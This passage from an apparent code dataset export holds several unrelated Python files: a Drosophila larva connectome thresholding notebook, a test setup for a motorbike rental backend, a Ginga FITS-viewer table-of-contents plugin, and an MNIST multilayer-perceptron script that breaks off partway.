synapses left\": p_syns_left,\n }\n rows.append(row)\n return pd.DataFrame(rows)\n\n\n# %% [markdown]\n# # throw out all edges to or from any cell with...\n# # threshold curves for cells w > 100 dendritic inputs\n# # threshold curves for cells w > 50 dendritic inputs\n# # do the thresholding based on percent input\n\nbase_path = Path(\n \"maggot_models/data/raw/Maggot-Brain-Connectome/4-color-matrices_Brain/\"\n)\nsub_path = Path(\"2020-01-21/input_counts.csv\")\ninput_path = base_path / sub_path\ninput_df = pd.read_csv(input_path)\ninput_df = input_df.set_index(\"skeleton_id\")\ninput_thresh = 100\nremove_inds = input_df[input_df[\" dendrite_inputs\"] < input_thresh].index\n\ngraph_type = \"Gadn\"\nmg = load_metagraph(graph_type, version=BRAIN_VERSION)\ng = mg.g\nmeta = mg.meta\nremove_pdiff = True\nif remove_pdiff:\n keep_inds = np.where(~mg[\"is_pdiff\"])[0]\n mg = mg.reindex(keep_inds)\nedgelist_df = mg.to_edgelist(remove_unpaired=True)\nedgelist_df[\"source\"] = edgelist_df[\"source\"].astype(\"int64\")\nedgelist_df[\"target\"] = edgelist_df[\"target\"].astype(\"int64\")\n\nn_paired_edges = len(edgelist_df)\n# get rid of edges where the target is a low dendritic input node\nedgelist_df = edgelist_df[~edgelist_df[\"target\"].isin(remove_inds)]\nn_left_edges = len(edgelist_df)\n\nmax_pair_edge_df = edgelist_df.groupby(\"edge pair ID\", sort=False).max()\nedge_max_weight_map = dict(zip(max_pair_edge_df.index.values, max_pair_edge_df.values))\nedgelist_df[\"max_weight\"] = itemgetter(*edgelist_df[\"edge pair ID\"])(\n edge_max_weight_map\n)\n\nthresh_result_df = threshold_sweep(edgelist_df, max_pair_edge_df)\n\nfig, ax = plt.subplots(1, 1, figsize=(10, 6))\nsns.lineplot(\n data=thresh_result_df, x=\"threshold\", y=\"Prop. paired edges symmetric\", ax=ax\n)\nremove_spines(ax)\nax_right = plt.twinx(ax)\nsns.lineplot(\n data=thresh_result_df,\n x=\"threshold\",\n y=\"Prop. edges left\",\n ax=ax_right,\n color=\"orange\",\n label=\"Edges\",\n)\nremove_spines(ax_right)\nsns.lineplot(\n data=thresh_result_df,\n x=\"threshold\",\n y=\"Prop. synapses left\",\n ax=ax_right,\n color=\"green\",\n label=\"Synapses\",\n)\nax_right.set_ylabel(\"Prop. 
left\")\nax.set_title(\n f\"Min dendridic input = {input_thresh} (removed {n_paired_edges - n_left_edges} edges)\"\n)\npad = 0.02\nax.set_ylim((0 - pad, 1 + pad))\nax_right.set_ylim((0 - pad, 1 + pad))\nplt.legend(bbox_to_anchor=(1.08, 1), loc=2, borderaxespad=0.0)\nstashfig(f\"min-dend-{input_thresh}-threshold-sweep-{graph_type}\")\n# %% [markdown]\n# # get number of inputs to kenyon cells\n# # just list the number of connections onto each kenyon cell, by claw number\nplt.style.use(\"seaborn-whitegrid\")\nsns.set_context(\"talk\")\ngraph_type = \"Gad\"\nmg = load_metagraph(graph_type, version=BRAIN_VERSION)\nedgelist_df = mg.to_edgelist()\nadj = mg.adj\nclass_labels = mg.meta[\"Class 1\"].fillna(\"\")\nsubclass_labels = mg.meta[\"Class 2\"].fillna(\"\")\nkc_inds = np.where(class_labels == \"KC\")[0]\nfor i in range(1, 7):\n name = f\"{i}claw\"\n sub_edgelist_df = edgelist_df[edgelist_df[\"target Class 2\"] == name]\n ids = sub_edgelist_df[\"target\"].unique()\n # fig, ax = plt.subplots(1, 1, figsize=(15, 5))\n fig = plt.figure(figsize=(20, 7))\n ax = plt.subplot2grid((1, 5), (0, 0), colspan=4)\n ax2 = plt.subplot2grid((1, 5), (0, 4), colspan=1)\n sns.stripplot(data=sub_edgelist_df, y=\"weight\", x=\"target\", ax=ax, order=ids)\n for tick in ax.get_xticklabels():\n tick.set_rotation(90)\n ax.set_title(name + \" input weights\")\n # remove_spines(ax, keep_corner=True)\n mins = []\n ticks = ax.get_xticks()\n color = sns.color_palette(\"deep\", desat=1, n_colors=2)[1]\n for j, cell_id in enumerate(ids):\n cell_df = sub_edgelist_df[sub_edgelist_df[\"target\"] == cell_id]\n cell_df = cell_df.sort_values(\"weight\", ascending=False)\n cell_df = cell_df.iloc[:i, :]\n min_max_weight = cell_df[\"weight\"].min()\n ax.text(\n j,\n min_max_weight,\n min_max_weight,\n fontsize=\"small\",\n horizontalalignment=\"center\",\n verticalalignment=\"bottom\",\n )\n mins.append(min_max_weight)\n sns.violinplot(\n mins, ax=ax2, orient=\"v\", inner=\"quart\", color=color, alpha=0.8, saturation=1\n )\n median = np.median(mins)\n ax2.text(\n 0,\n median,\n f\"{median:.0f}\",\n horizontalalignment=\"center\",\n verticalalignment=\"center\",\n backgroundcolor=color,\n alpha=0.8,\n )\n # ax2.yaxis.set_major_locator(plt.NullLocator())\n ax2.set_ylim(ax.get_ylim())\n ax2.yaxis.set_ticks([])\n ax2.set_title(\"\")\n stashfig(name + \"-input-weights\")\n\nname = \"all KC\"\nkc_edgelist_df = edgelist_df[edgelist_df[\"target Class 1\"] == \"KC\"]\nfig, ax = plt.subplots(1, 1, figsize=(15, 5))\nsns.stripplot(\n data=kc_edgelist_df,\n y=\"weight\",\n x=\"target Class 2\",\n ax=ax,\n order=[f\"{i}claw\" for i in range(1, 7)],\n jitter=0.45,\n)\nfor tick in ax.get_xticklabels():\n tick.set_rotation(90)\nax.set_title(name + \" input weights\")\n# remove_spines(ax, keep_corner=True)\nstashfig(\"all-kc-input-weights\")\n\n# %% [markdown]\n# # plot the distribution of # of dendritic / axonic inputs\n\ngraph_type = \"Gad\"\nmg = load_metagraph(graph_type, version=BRAIN_VERSION)\nmeta = mg.meta\nmeta.loc[input_df.index, \"dendrite_input\"] = input_df[\" dendrite_inputs\"]\nmeta.loc[input_df.index, \"axon_input\"] = input_df[\" axon_inputs\"]\n\n\ndef filter(string):\n string = string.replace(\"akira\", \"\")\n string = string.replace(\"Lineage\", \"\")\n string = string.replace(\"*\", \"\")\n string = string.strip(\"_\")\n return string\n\n\nlineages = meta[\"lineage\"]\nlineages = np.vectorize(filter)(lineages)\nmeta[\"lineage\"] = lineages\n\n\nn_rows = 6\nfig, axs = plt.subplots(n_rows, 1, figsize=(15, 30), 
sharey=True)\nuni_lineages = np.unique(meta[\"lineage\"])\nn_lineages = len(uni_lineages)\nn_per_row = n_lineages // n_rows\nfor i in range(n_rows):\n ax = axs[i]\n temp_lineages = uni_lineages[i * n_per_row : (i + 1) * n_per_row]\n temp_df = meta[meta[\"lineage\"].isin(temp_lineages)]\n sns.stripplot(\n data=temp_df, x=\"lineage\", y=\"dendrite_input\", ax=ax, palette=\"deep\", jitter=0.4\n )\n for tick in ax.get_xticklabels():\n tick.set_rotation(90)\n ax.set_xlabel(\"\")\n remove_spines(ax)\n ax.yaxis.set_major_locator(plt.MaxNLocator(3))\n ax.xaxis.set_tick_params(length=0)\nplt.tight_layout()\nstashfig(\"all-lineage-dendrite-input\")\n\n# %% [markdown]\n# # Plot this but by cell class\nn_rows = 3\nuni_lineages = np.unique(meta[\"Merge Class\"])\nn_lineages = len(uni_lineages)\nn_per_row = n_lineages // n_rows\nfig, axs = plt.subplots(n_rows + 1, 1, figsize=(15, 30), sharey=True)\nfor i in range(n_rows):\n ax = axs[i]\n temp_lineages = uni_lineages[i * n_per_row : (i + 1) * n_per_row]\n temp_df = meta[meta[\"Merge Class\"].isin(temp_lineages)]\n sns.stripplot(\n data=temp_df,\n x=\"Merge Class\",\n y=\"dendrite_input\",\n ax=ax,\n palette=\"deep\",\n jitter=0.4,\n )\n for tick in ax.get_xticklabels():\n tick.set_rotation(90)\n ax.set_xlabel(\"\")\n remove_spines(ax)\n ax.yaxis.set_major_locator(plt.MaxNLocator(3))\n ax.xaxis.set_tick_params(length=0)\nxlim = ax.get_xlim()\nax = axs[-1]\ntemp_lineages = uni_lineages[(i + 1) * n_per_row :]\ntemp_df = meta[meta[\"Merge Class\"].isin(temp_lineages)]\nsns.stripplot(\n data=temp_df, x=\"Merge Class\", y=\"dendrite_input\", ax=ax, palette=\"deep\", jitter=0.4\n)\nfor tick in ax.get_xticklabels():\n tick.set_rotation(90)\nax.set_xlabel(\"\")\nremove_spines(ax)\nax.yaxis.set_major_locator(plt.MaxNLocator(3))\nax.xaxis.set_tick_params(length=0)\nax.set_xlim(xlim)\nplt.tight_layout()\nstashfig(\"all-merge-class-dendrite-input\")\n\n# %% [markdown]\n# # plot some kind of asymmetry score by lineage\n# # - proportion of edges onto a lineage which are asymmetric after thresholding\n# # - IOU score?\n# # - something else?\n\ngraph_type = \"Gadn\"\nmg = load_metagraph(graph_type, version=BRAIN_VERSION)\ng = mg.g\nmeta = mg.meta\n\nlineages = meta[\"lineage\"]\nlineages = np.vectorize(filter)(lineages)\nmeta[\"lineage\"] = lineages\n\nedgelist_df = mg.to_edgelist(remove_unpaired=True)\nedgelist_df[\"source\"] = edgelist_df[\"source\"].astype(\"int64\")\nedgelist_df[\"target\"] = edgelist_df[\"target\"].astype(\"int64\")\n\nn_paired_edges = len(edgelist_df)\n# get rid of edges where the target is a low dendritic input node\nedgelist_df = edgelist_df[~edgelist_df[\"target\"].isin(remove_inds)]\nn_left_edges = len(edgelist_df)\n\nmax_pair_edge_df = edgelist_df.groupby(\"edge pair ID\").max()\nedge_max_weight_map = dict(\n zip(max_pair_edge_df.index.values, max_pair_edge_df[\"weight\"])\n)\nedgelist_df[\"max_weight\"] = itemgetter(*edgelist_df[\"edge pair ID\"])(\n edge_max_weight_map\n)\n\nthreshold = 0.0\nthresh_df = max_pair_edge_df[max_pair_edge_df[\"weight\"] > threshold]\n\nsource_pair_ids = np.unique(max_pair_edge_df[\"source Pair ID\"])\ntarget_pair_ids = np.unique(max_pair_edge_df[\"target Pair ID\"])\npair_ids = np.union1d(source_pair_ids, target_pair_ids)\n\nrows = []\nfor pid in pair_ids:\n temp_df = thresh_df[\n (thresh_df[\"source Pair ID\"] == pid) | (thresh_df[\"target Pair ID\"] == pid)\n ]\n\n if len(temp_df) > 0:\n iou = len(temp_df[temp_df[\"edge pair counts\"] == 2]) / len(temp_df)\n else:\n iou = 0\n\n temp_meta = meta[meta[\"Pair 
ID\"] == pid]\n lineage = temp_meta[\"lineage\"].values[0]\n row = {\"IOU\": iou, \"lineage\": lineage}\n rows.append(row)\n\nlineage_iou_df = pd.DataFrame(rows)\n\nn_rows = 6\nfig, axs = plt.subplots(n_rows, 1, figsize=(15, 30), sharey=True)\nuni_lineages = np.unique(lineage_iou_df[\"lineage\"])\nn_lineages = len(uni_lineages)\nn_per_row = n_lineages // n_rows\nfor i in range(n_rows):\n ax = axs[i]\n temp_lineages = uni_lineages[i * n_per_row : (i + 1) * n_per_row]\n temp_df = lineage_iou_df[lineage_iou_df[\"lineage\"].isin(temp_lineages)]\n sns.stripplot(data=temp_df, x=\"lineage\", y=\"IOU\", ax=ax, palette=\"deep\", jitter=0.4)\n for tick in ax.get_xticklabels():\n tick.set_rotation(90)\n ax.set_xlabel(\"\")\n remove_spines(ax)\n ax.yaxis.set_major_locator(plt.MaxNLocator(3))\n ax.xaxis.set_tick_params(length=0)\nplt.suptitle(f\"IOU after threshold = {threshold}\", y=1.02)\nplt.tight_layout()\nstashfig(f\"all-lineage-iou-{threshold}\")\n\n# %% [markdown]\n# # Do the same by cell class\n\nrows = []\nfor pid in pair_ids:\n temp_df = thresh_df[\n (thresh_df[\"source Pair ID\"] == pid) | (thresh_df[\"target Pair ID\"] == pid)\n ]\n\n if len(temp_df) > 0:\n iou = len(temp_df[temp_df[\"edge pair counts\"] == 2]) / len(temp_df)\n else:\n iou = 0\n\n temp_meta = meta[meta[\"Pair ID\"] == pid]\n lineage = temp_meta[\"Merge Class\"].values[0]\n row = {\"IOU\": iou, \"Merge Class\": lineage}\n rows.append(row)\n\nlineage_iou_df = pd.DataFrame(rows)\n\nn_rows = 3\nfig, axs = plt.subplots(n_rows, 1, figsize=(15, 30), sharey=True)\nuni_lineages = np.unique(lineage_iou_df[\"Merge Class\"])\nn_lineages = len(uni_lineages)\nn_per_row = n_lineages // n_rows\nfor i in range(n_rows):\n ax = axs[i]\n temp_lineages = uni_lineages[i * n_per_row : (i + 1) * n_per_row]\n temp_df = lineage_iou_df[lineage_iou_df[\"Merge Class\"].isin(temp_lineages)]\n sns.stripplot(\n data=temp_df, x=\"Merge Class\", y=\"IOU\", ax=ax, palette=\"deep\", jitter=0.4\n )\n for tick in ax.get_xticklabels():\n tick.set_rotation(90)\n ax.set_xlabel(\"\")\n remove_spines(ax)\n ax.yaxis.set_major_locator(plt.MaxNLocator(3))\n ax.xaxis.set_tick_params(length=0)\nplt.suptitle(f\"IOU after threshold = {threshold}\", y=1.02)\nplt.tight_layout()\nstashfig(f\"all-class-iou-{threshold}\")\n","sub_path":"notebooks/64.2-BDP-threshold-investigations.py","file_name":"64.2-BDP-threshold-investigations.py","file_ext":"py","file_size_in_byte":13678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"483162823","text":"import unittest\nfrom app import app\nfrom db import db\nfrom models.users import UsersModel\nfrom models.motos import MotosModel\nfrom models.rentals import RentalsModel\nfrom datetime import datetime\n\nclass BaseTestClass(unittest.TestCase):\n def setUp(self):\n self.app = app\n self.client = self.app.test_client()\n # Crea un contexto de aplicación\n with self.app.app_context():\n # Crea las tablas de la base de datos\n db.create_all()\n self.init_users()\n self.init_motos()\n self.init_rentals()\n\n def tearDown(self):\n with self.app.app_context():\n # Elimina todas las tablas de la base de datos\n db.session.remove()\n db.drop_all()\n\n def init_users(self):\n user1 = UsersModel(mail='joanmartin123@gmail.com',\n google_token='juy65rfty76Hg65FVytfGGDD63ccxeDFg',\n role=0)\n user1.country = 'España'\n user1.id_bank_data = 1234567890123456\n user1.name = 'Joan'\n user1.surname = 'Martin'\n user1.national_id_document = '23432123P'\n user1.save_to_db()\n user2 = 
UsersModel(mail='joanmartin456@gmail.com',\n                           google_token='jug65FVytfGGDD63ccxeDFg',\n                           role=0)\n        user2.country = 'España'\n        user2.id_bank_data = 6543217890123456\n        user2.name = 'Juan'\n        user2.surname = 'Martínez'\n        user2.national_id_document = '23845467M'\n        user2.save_to_db()\n\n    def init_motos(self):\n        moto1 = MotosModel('1234AAA', 99, 42.1, 2.1)\n        moto2 = MotosModel('4321AAA', 10, 42.0, 2.1)\n        moto3 = MotosModel('5678AAA', 9, 42.1, 2.0)\n        moto4 = MotosModel('8765AAA', 32, 42.0, 2.0)\n        moto1.save_to_db()\n        moto2.save_to_db()\n        moto3.save_to_db()\n        moto4.save_to_db()\n\n    def init_rentals(self):\n        rental1 = RentalsModel(1, 1, datetime.now().isoformat())\n        rental1.save_to_db()\n","sub_path":"Backend/tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"219531973","text":"#\n# Contents.py -- Table of Contents plugin for fits viewer\n#\n# This is open-source software licensed under a BSD license.\n# Please see the file LICENSE.txt for details.\n#\nfrom ginga.util.six import itervalues\nfrom ginga.util.six.moves import map\n\nfrom ginga import GingaPlugin\nfrom ginga.misc import Bunch\n\nfrom ginga.gw import Widgets\nimport time\n\n\nclass Contents(GingaPlugin.GlobalPlugin):\n    \"\"\"\n    Contents\n    ========\n    The Contents plugin provides a table-of-contents-like interface for all\n    the images viewed since the program was started.  Unlike Thumbs,\n    Contents is sorted by channel.  The table also shows some configurable\n    metadata from the image.\n\n    Plugin Type: Global\n    -------------------\n    Contents is a global plugin.  Only one instance can be opened.\n\n    Usage\n    -----\n    Double-click on a column heading to sort the table by that column's\n    value.  The image in the currently focused channel will normally be\n    highlighted.  
You can click on any image to force that image to be shown\n in the associated channel.\n \"\"\"\n def __init__(self, fv):\n # superclass defines some variables for us, like logger\n super(Contents, self).__init__(fv)\n\n columns = [ ('Name', 'NAME'), ('Object', 'OBJECT'),\n ('Date', 'DATE-OBS'), ('Time UT', 'UT'),\n ('Modified', 'MODIFIED')\n ]\n\n prefs = self.fv.get_preferences()\n self.settings = prefs.create_category('plugin_Contents')\n self.settings.add_defaults(columns=columns,\n always_expand=True,\n highlight_tracks_keyboard_focus=True,\n color_alternate_rows=True,\n row_font_color='green',\n max_rows_for_col_resize=100)\n self.settings.load(onError='silent')\n\n # For table-of-contents pane\n self.name_dict = Bunch.caselessDict()\n # TODO: this ought to be customizable by channel\n self.columns = self.settings.get('columns', columns)\n self.treeview = None\n # paths of highlighted entries, by channel\n self.highlight_tracks_keyboard_focus = self.settings.get(\n 'highlight_tracks_keyboard_focus', True)\n self._hl_path = set([])\n\n fv.add_callback('add-image', self.add_image_cb)\n fv.add_callback('add-image-info', self.add_image_info_cb)\n fv.add_callback('remove-image', self.remove_image_cb)\n fv.add_callback('add-channel', self.add_channel_cb)\n fv.add_callback('delete-channel', self.delete_channel_cb)\n fv.add_callback('channel-change', self.focus_cb)\n\n self.gui_up = False\n\n def build_gui(self, container):\n # create the Treeview\n always_expand = self.settings.get('always_expand', False)\n color_alternate = self.settings.get('color_alternate_rows', True)\n treeview = Widgets.TreeView(auto_expand=always_expand,\n sortable=True,\n use_alt_row_color=color_alternate)\n self.treeview = treeview\n treeview.setup_table(self.columns, 2, 'NAME')\n\n treeview.add_callback('selected', self.switch_image)\n container.add_widget(treeview, stretch=1)\n\n self.gui_up = True\n\n def stop(self):\n self.gui_up = False\n\n def switch_image(self, widget, res_dict):\n if len(res_dict) == 0:\n return\n chname = list(res_dict.keys())[0]\n img_dict = res_dict[chname]\n if len(img_dict) == 0:\n return\n imname = list(img_dict.keys())[0]\n bnch = img_dict[imname]\n if not 'path' in bnch:\n # may be a top-level channel node, e.g. 
in gtk\n return\n\n path = bnch.path\n self.logger.debug(\"chname=%s name=%s path=%s\" % (\n chname, imname, path))\n\n self.fv.switch_name(chname, imname, path=path,\n image_future=bnch.image_future)\n\n def get_info(self, chname, name, image, info):\n path = info.get('path', None)\n future = info.get('image_future', None)\n\n bnch = Bunch.Bunch(CHNAME=chname, imname=name, path=path,\n image_future=future)\n\n # Get header keywords of interest\n if image is not None:\n header = image.get_header()\n else:\n header = {}\n\n for hdr, key in self.columns:\n bnch[key] = str(header.get(key, 'N/A'))\n\n # name should always be available\n bnch.NAME = name\n\n # Modified timestamp will be set if image data is modified\n timestamp = info.time_modified\n if timestamp is not None:\n # Z: Zulu time, GMT, UTC\n timestamp = timestamp.strftime('%Y-%m-%d %H:%M:%SZ')\n bnch.MODIFIED = timestamp\n\n return bnch\n\n def recreate_toc(self):\n self.logger.debug(\"Recreating table of contents...\")\n self.treeview.set_tree(self.name_dict)\n\n # re-highlight as necessary\n if self.highlight_tracks_keyboard_focus:\n new_highlight = self._hl_path\n else:\n new_highlight = set([])\n for chname in self.name_dict:\n channel = self.fv.get_channel_info(chname)\n new_highlight |= channel.extdata.contents_old_highlight\n self.update_highlights(set([]), new_highlight)\n\n # Resize column widths\n n_rows = sum(map(len, self.name_dict.values()))\n if n_rows < self.settings.get('max_rows_for_col_resize', 100):\n self.treeview.set_optimal_column_widths()\n self.logger.debug(\"Resized columns for {0} row(s)\".format(n_rows))\n\n def is_in_contents(self, chname, imname):\n if not chname in self.name_dict:\n return False\n\n file_dict = self.name_dict[chname]\n if not imname in file_dict:\n return False\n\n return True\n\n def add_image_cb(self, viewer, chname, image, image_info):\n if not self.gui_up:\n return False\n\n name = image_info.name\n self.logger.debug(\"name=%s\" % (name))\n\n if image is not None:\n nothumb = image.get('nothumb', False)\n if nothumb:\n return\n\n bnch = self.get_info(chname, name, image, image_info)\n\n if not chname in self.name_dict:\n # channel does not exist yet in contents\n # Note: this typically shouldn't happen, because add_channel_cb()\n # will have added an empty dict\n file_dict = {}\n self.name_dict[chname] = file_dict\n else:\n file_dict = self.name_dict[chname]\n\n if not name in file_dict:\n # new image\n file_dict[name] = bnch\n else:\n # old image\n file_dict[name].update(bnch)\n\n # TODO: either make add_tree() merge updates or make an\n # update_tree() method--shouldn't need to recreate entire\n # tree, just add new entry and possibly rehighlight\n ## tree_dict = { chname: { name: bnch } }\n ## self.treeview.add_tree(tree_dict)\n self.recreate_toc()\n\n self.logger.debug(\"%s added to Contents\" % (name))\n\n def add_image_info_cb(self, viewer, channel, image_info):\n \"\"\"Almost the same as add_image_info(), except that the image\n may not be loaded in memory.\n \"\"\"\n chname = channel.name\n name = image_info.name\n self.logger.debug(\"name=%s\" % (name))\n\n # Updates of any extant information\n try:\n image = channel.get_loaded_image(name)\n except KeyError:\n # images that are not yet loaded will show \"N/A\" for keywords\n image = None\n\n self.add_image_cb(viewer, chname, image, image_info)\n\n def remove_image_cb(self, viewer, chname, name, path):\n if not self.gui_up:\n return False\n\n if chname not in self.name_dict:\n return\n\n file_dict = 
self.name_dict[chname]\n\n if name not in file_dict:\n return\n\n del file_dict[name]\n\n # Unhighlight\n channel = self.fv.get_channel_info(chname)\n key = (chname, name)\n self._hl_path.discard(key)\n channel.extdata.contents_old_highlight.discard(key)\n\n self.recreate_toc()\n self.logger.debug(\"%s removed from Contents\" % (name))\n\n def clear(self):\n self.name_dict = Bunch.caselessDict()\n self._hl_path = set([])\n self.recreate_toc()\n\n def add_channel_cb(self, viewer, channel):\n \"\"\"Called when a channel is added from the main interface.\n Parameter is a channel (a Channel object).\"\"\"\n chname = channel.name\n\n # add old highlight set to channel external data\n channel.extdata.setdefault('contents_old_highlight', set([]))\n\n # Add the channel to the treeview\n file_dict = {}\n self.name_dict.setdefault(chname, file_dict)\n\n if not self.gui_up:\n return False\n\n tree_dict = { chname: { } }\n self.treeview.add_tree(tree_dict)\n\n def delete_channel_cb(self, viewer, channel):\n \"\"\"Called when a channel is deleted from the main interface.\n Parameter is a channel (a Channel object).\"\"\"\n chname = channel.name\n del self.name_dict[chname]\n\n # Unhighlight\n un_hilite_set = set([])\n for path in self._hl_path:\n if path[0] == chname:\n un_hilite_set.add(path)\n self._hl_path -= un_hilite_set\n\n if not self.gui_up:\n return False\n self.recreate_toc()\n\n def _get_hl_key(self, chname, image):\n return (chname, image.get('name', 'none'))\n\n def _highlight_path(self, hl_path, tf):\n \"\"\"Highlight or unhighlight a single entry.\n\n Examples\n --------\n >>> hl_path = self._get_hl_key(chname, image)\n >>> self._highlight_path(hl_path, True)\n\n \"\"\"\n fc = self.settings.get('row_font_color', 'green')\n\n try:\n self.treeview.highlight_path(hl_path, tf, font_color=fc)\n except Exception as e:\n self.logger.error('Error changing highlight on treeview path '\n '({0}): {1}'.format(hl_path, str(e)))\n\n def update_highlights(self, old_highlight_set, new_highlight_set):\n \"\"\"Unhighlight the entries represented by ``old_highlight_set``\n and highlight the ones represented by ``new_highlight_set``.\n\n Both are sets of keys.\n\n \"\"\"\n un_hilite_set = old_highlight_set - new_highlight_set\n re_hilite_set = new_highlight_set - old_highlight_set\n\n # unhighlight entries that should NOT be highlighted any more\n for key in un_hilite_set:\n self._highlight_path(key, False)\n\n # highlight new entries that should be\n for key in re_hilite_set:\n self._highlight_path(key, True)\n\n def redo(self, channel, image):\n \"\"\"This method is called when an image is set in a channel.\"\"\"\n\n imname = image.get('name', 'none')\n chname = channel.name\n # is image in contents tree yet?\n in_contents = self.is_in_contents(chname, imname)\n\n # get old highlighted entries for this channel -- will be\n # an empty set or one key\n old_highlight = channel.extdata.contents_old_highlight\n\n # calculate new highlight keys -- again, an empty set or one key\n if image is not None:\n key = self._get_hl_key(chname, image)\n new_highlight = set([key])\n else:\n # no image has the focus\n new_highlight = set([])\n\n # Only highlights active image in the current channel\n if self.highlight_tracks_keyboard_focus:\n if in_contents:\n self.update_highlights(self._hl_path, new_highlight)\n self._hl_path = new_highlight\n\n # Highlight all active images in all channels\n else:\n if in_contents:\n self.update_highlights(old_highlight, new_highlight)\n channel.extdata.contents_old_highlight = 
new_highlight\n\n return True\n\n def focus_cb(self, viewer, channel):\n chname = channel.name\n image = channel.get_current_image()\n\n if image is not None:\n key = self._get_hl_key(chname, image)\n new_highlight = set([key])\n else:\n # no image has the focus\n new_highlight = set([])\n\n if self.highlight_tracks_keyboard_focus:\n self.update_highlights(self._hl_path, new_highlight)\n self._hl_path = new_highlight\n\n def __str__(self):\n return 'contents'\n\n#END\n","sub_path":"ginga/rv/plugins/Contents.py","file_name":"Contents.py","file_ext":"py","file_size_in_byte":12769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"628282893","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Dec 4 23:12:33 2017\r\n\r\n@author: JSZJZ\r\n\"\"\"\r\n\r\n# Relu and Sigmoid # learning curve (speed)\r\n# learning cuve find the step size and mini-batch size (learning curve)\r\n# PCA and downsample - accuarcy and confused matrix\r\n# dropout for overfitting (training and validation) - learning curve and accuarcy\r\n# SGD and momentum for the local optima - accuarcy and matrix\r\n# output confused matrix and accuracy for the test datq - matrix and accuarcy\r\n\r\n\r\nimport numpy as np\r\nimport math\r\nimport matplotlib.pyplot as plt\r\nimport LoadMNIST as mn\r\nimport random\r\nfrom sklearn.decomposition import PCA\r\n\r\n\r\n#%%\r\nnew_row = 14\r\nnew_col = 14\r\nnew_dimensions = new_row*new_col\r\nshrink = int(math.sqrt(784/new_dimensions))\r\nbatch_size = 100\r\nhidden_dimensions = 100\r\noutput_dimensions = 10\r\niteration = 500\r\nstep = 0.005\r\nmoment = 0.2\r\nD1_before = 0\r\nD2_before = 0\r\nchoice = 2\r\ndropout = 0\r\nmo = 1\r\n\r\n# load data\r\nimages,labels = mn.load_mnist(dataset=\"training\", digits=np.arange(10), path=\"\", size = 60000)\r\ntesting_images,testing_labels = mn.load_mnist(dataset=\"testing\", digits=np.arange(10), path=\"\", size = 10000)\r\n# cross-validation\r\ntraining_images = images[0:50000,:,:]\r\nvalidation_images = images[50000:,:,:]\r\ntraining_labels = labels[0:50000]\r\nvalidation_labels = labels[50000:]\r\n# get length\r\nrow = training_images.shape[1]\r\ncolumn = training_images.shape[2]\r\ntraining_length = training_images.shape[0]\r\ntesting_length = testing_images.shape[0]\r\nvalidation_length = validation_images.shape[0]\r\nbatch_iteration = int(training_length/batch_size)\r\nBias_Input = np.ones([batch_size,1])\r\n\r\nw1 = np.random.randn(new_dimensions+1,hidden_dimensions)*0.1\r\nw2 = np.random.randn(hidden_dimensions+1,output_dimensions)*0.1\r\nfig = plt.figure(figsize = (10,60)) \r\n\r\n#%%\r\ndef ChangeLabelstoDec(labels,length):\r\n t = np.zeros([length,10])\r\n for i in range(length):\r\n index = round(labels[i])\r\n t[i,index] = 1\r\n return t\r\n\r\n#%%\r\n# sigma ReLu\r\ndef ReLu(x):\r\n return np.maximum(x, 0)\r\n \r\n# derivative sigma ReLu\r\ndef der_ReLu(x):\r\n return (x>0).astype(x.dtype)\r\n\r\ndef sig(x):\r\n t = (1/(1+np.exp(-x)))\r\n return t\r\n\r\n\r\ndef der_sig(x):\r\n t = (1/(1+np.exp(-x)))*(1-(1/(1+np.exp(-x))))\r\n return t\r\n\r\n\r\n#%%\r\ndef MLP(x,activation,dropout):\r\n global w1\r\n global w2\r\n xlength = x.shape[0]\r\n Bias = np.ones([xlength,1])\r\n if dropout == 1:\r\n w1 = 0.5*w1\r\n w2 = 0.5*w2\r\n Input = np.column_stack([Bias,x])\r\n Net1 = np.dot(Input,(w1))\r\n if activation == 0:\r\n hd_output = sig(Net1)\r\n else:\r\n if activation == 1:\r\n hd_output = ReLu(Net1)\r\n hd_input = np.column_stack([Bias,hd_output])\r\n Net2 = 
np.dot(hd_input,(w2))\r\n if activation == 0:\r\n Output = sig(Net2)\r\n else:\r\n if activation == 1: \r\n Output = ReLu(Net2)\r\n return Output\r\n \r\n\r\n#%%\r\ndef MLP_Learning(x,l,activation,step,dropout,momentum):\r\n global w1\r\n global w2\r\n global D1_before\r\n global D2_before\r\n global moment\r\n step1 = step\r\n step2 = step\r\n size = x.shape[0]\r\n Bias_Input = np.ones([size,1])\r\n Input = np.column_stack([Bias_Input,x])\r\n p = 0.5\r\n P = np.random.binomial([np.ones((size,hidden_dimensions))],p)[0]\r\n size = x.shape[0]\r\n Bias_Input = np.ones([size,1])\r\n Input = np.column_stack([Bias_Input,x])\r\n net1 = np.dot(Input,w1)\r\n if activation == 0:\r\n hd_output = sig(net1)\r\n else:\r\n if activation == 1:\r\n hd_output = ReLu(net1)\r\n if dropout == 1:\r\n hd_output = np.multiply(hd_output,P)\r\n hd_input = np.column_stack([Bias_Input,hd_output])\r\n \r\n net2 = np.dot(hd_input,w2)\r\n if activation == 0:\r\n Output = sig(net2) \r\n else:\r\n if activation == 1:\r\n Output = ReLu(net2) \r\n error = np.array(l-Output)\r\n \r\n # backpropagation\r\n if activation == 0:\r\n der_output = der_sig(net2)\r\n else:\r\n if activation == 1:\r\n der_output = der_ReLu(net2) \r\n delta_output = error*der_output\r\n D2 = (np.dot(hd_input.T,delta_output))/batch_size\r\n \r\n if activation == 0:\r\n der_hidden = der_sig(net1)\r\n else:\r\n if activation == 1:\r\n der_hidden = der_ReLu(net1) \r\n local_error = delta_output@w2[1:hidden_dimensions+1,:].T\r\n D1 = (Input.T@(local_error*der_hidden))/batch_size\r\n \r\n if momentum == 0:\r\n moment = 0\r\n w1 = w1 + step1*D1 - moment*D1_before\r\n w2 = w2 + step2*D2 - moment*D2_before\r\n D1_before = step1*D1\r\n D2_before = step2*D2\r\n return error\r\n\r\n#%%\r\ndef downsample(myarr,factor):\r\n ys,xs = myarr.shape\r\n crarr = myarr[:ys-(ys % int(factor)),:xs-(xs % int(factor))]\r\n dsarr = np.mean( np.concatenate([[crarr[i::factor,j::factor] \r\n for i in range(factor)] \r\n for j in range(factor)]), axis=0)\r\n return dsarr\r\n\r\n\r\n#%%\r\n# data 